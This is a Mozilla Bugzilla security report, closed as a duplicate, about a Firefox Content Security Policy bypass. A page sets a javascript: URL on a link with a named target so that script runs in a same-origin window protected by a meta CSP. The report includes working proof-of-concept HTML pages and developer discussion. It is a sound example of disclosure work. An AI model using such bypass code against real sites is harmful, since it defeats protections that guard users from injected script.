Closed Bug 1448828 Opened 7 years ago Closed 7 years ago

Firefox CSP Bypass through target

Categories

(Core :: DOM: Security, defect)

defect
Not set
normal

Tracking

()

RESOLVED DUPLICATE of bug 1448827

People

(Reporter: xsseng, Unassigned)

Details

(Keywords: reporter-external)

Attachments

(1 file)

140.92 KB, application/vnd.openxmlformats-officedocument.wordprocessingml.document
Details
User Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36

Steps to reproduce:

It has an issue when set through <meta>. You know, the webpage can run JavaScript code through window.opener and target if they are same-origin.

Actual results:

<script>
function start() {
  setInterval(function() {
    baidu.href = "javascript:alert(location.href);";
    baidu.click();
  }, 5000);
}
</script>

Expected results:

CSP bypass
Summary: cps bypass → Firefox CSP Bypass through window.opener
Summary: Firefox CSP Bypass through window.opener → Firefox CSP Bypass through target
Firefox Security Team:

I found a CSP bypass today. We know CSP can be set in two ways.

Response header:
Content-Security-Policy: script-src 'self' https://apis.google.com

Webpage:
<meta http-equiv="Content-Security-Policy" content="script-src 'none'">

It has an issue when set through <meta>. You know, the webpage can run JavaScript code through window.opener and target if they are same-origin.

Firefox CSP Bypass <Undisclosed>

I created 2 webpages, go.html and target.html.

go.html:
<html>
<head><meta charset="utf-8"></head>
<body>
<a href="./target.html" target="baidu" id="baidu" onclick="return start()">click me</a>
<script>
function start() {
  setInterval(function() {
    baidu.href = "javascript:alert(location.href);";
    baidu.click();
  }, 5000);
}
</script>
</body>
</html>

target.html:
<!DOCTYPE html>
<html>
<head>
<title>CSP Test</title>
<meta http-equiv="Content-Security-Policy" content="script-src 'none'">
</head>
<body>
csp bypass
</body>
</html>

POC online: https://test.kolue.com/test/target/go.html
Group: core-security → dom-core-security
Component: Security → DOM: Security
Flags: needinfo?(ckerschb)
This one is interesting. In Chrome the javascript: alert opens in the original window that has no CSP -- completely ignores the target. In Firefox we obey the named target and open the javascript: URL in the other window (if it's same origin!). At that point it's essentially the same as bug 1448827. If the target window is not same-origin we focus it when you click (because of the target) but then silently drop the javascript execution (no error on the web or browser consoles). Which behavior for javascript: links with a target is "correct"? I bet it's not clearly specified.
Flags: needinfo?(annevk)
As it happens this one is, but Chrome has a bug (which I reported a while back and asked them to fix quickly due to compatibility issues, but they haven't): https://bugs.chromium.org/p/chromium/issues/detail?id=749492.
Flags: needinfo?(annevk)
I think so, you can close this bug. It's essentially the same as bug 1448827.
I am fine with closing this one as a duplicate of bug 1448827.
Flags: needinfo?(ckerschb)
Status: UNCONFIRMED → RESOLVED
Closed: 7 years ago
Resolution: --- → DUPLICATE
Flags: sec-bounty? → sec-bounty-
CVE and bounty?
(In reply to Lin Zhang from comment #7)
> CVE and bounty?

Please don't ask about these in the bugs. You need to email security@mozilla.org for these sorts of questions. This bug is resolved as a duplicate of another bug, so no CVE is assigned and it isn't eligible for a bounty. Only unique bugs get either of these.
Group: dom-core-security